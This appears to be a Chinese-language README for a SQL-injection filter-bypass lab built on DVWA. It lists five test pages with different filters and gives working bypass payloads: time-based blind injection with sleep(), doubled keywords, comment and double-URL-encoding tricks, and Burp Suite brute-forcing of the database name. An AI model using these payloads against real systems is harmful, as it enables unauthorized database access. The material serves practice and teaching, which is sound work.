sqli-bypass

提示说明：
————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————
index1.php 空格过滤

index2.php 关键字过滤 and /or 大小写

index3.php 双写关键字 || mysql 隐形转换 poc 1''a'=if(user()+like+'r%',sleep(2),1)--+ (sleep修改成exp也可)//适用于字符型

index4.php 双重url编码

index5.php 绕过正则匹配
poc1:1'|| mid(schema(),1,1) like'd
poc2:1'anandd+mid(ususerer(),1,1)like'r
——————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————
index1:

使用bp爆破出数据库长度，payload:'and/!length(schema())='1'/%23，爆破得出数据库长度为4。

使用bp爆破出数据库名称，payload:'and/!mid(schema(),1,1)='1'/%23，爆破得出数据库长度为dvwa。

index2:

使用bp爆破出数据库长度，payload:'%26%26length(database())='1'%23 ，爆破得出数据库长度为4。

使用bp爆破出数据库名称，payload:'%26%26mid(database(),1,1)='1'%23，爆破得出数据库长度为dvwa。